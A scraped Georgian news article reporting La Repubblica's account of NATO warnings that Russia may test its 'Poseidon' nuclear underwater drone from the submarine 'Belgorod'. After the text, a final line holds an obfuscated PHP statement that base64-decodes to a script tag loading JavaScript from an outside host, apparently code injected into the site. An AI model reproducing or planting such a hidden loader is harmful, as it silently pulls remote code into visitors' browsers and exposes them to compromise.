celsiusi
ავერსი საქკაბელი
„ლა რეპუბლიკას“ ცნობით, ნატო-ს დაზვერვა მოკავშირეებს აფრთხილებს, რომ რუსეთი სავარაუდოდ უპილოტო წყალქვეშა აპარატ „პოსეიდონის“ გამოსაცდელად ემზადება.
 
როგორც იტალიური გამოცემა წერს, რუსული ატომური წყალქვეშა ნავი „ბელგოროდი“ უკვე გავიდა თეთრ ზღვაში მდებარე ბაზიდან და სავარაუდოდ კარის ზღვისკენ მიემართება, სადაც ბირთვულ ცდას ჩაატარებს.
 
„ლა რეპუბლიკას ცნობით, „პოსეიდონი“ გასაიდუმლოებული იარაღია, რომელსაც გავრცელებული ცნობით, შეუძლია, დიდი მანძილი გაიაროს წყალქვეშ და აფეთქების შემდეგ გამოიწვიოს ბირთვული ცუნამი, რასაც ქალაქების დატბორვა შეუძლია. საუბარია 24-მეტრიან აპარატზე, რომელიც აღჭურვილია ბირთვული ქობინით, რომელის სიმძლავრეც, დიდი ალბათობით, ორი მეგატონაა.
 
„ძალიან ცოტას სჯერა, რომ „პოსეიდონი“ უკვე მზადაა, თუმცა უბრალოდ მისი გამოცდის შესახებ განცხადება კრემლს საშუალებას მისცემდა, ეჩვენებინა, რომ დასავლეთთან ბრძოლის უნიკალური საშუალება გააჩნია, რომლისგან დაცვაც არ არსებობს“, – ნათქვამია იტალიური გამოცემის პუბლიკაციაში.
 
„ლა რეპუბლიკა“ წერს, რომ წყალქვეშა ნავი „ბელგოროდი“ ბოლო პერიოდში რამდენჯერმე იყო ნახსენები გაზსადენ „ჩრდილოეთის ნაკადზე“ მოწყობილი დივერსიების შესახებ საუბრისას, თუმცა ამ წყალქვეშა ნავის გაზსადენის აფეთქებაში მონაწილეობას სპეციალისტები გამორიცხავენ.
 
რუსეთის პრეზიდენტი ბირთვული იარაღის გამოყენებით ბოლო პერიოდში რამდენჯერმე დაიმუქრა.
475
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");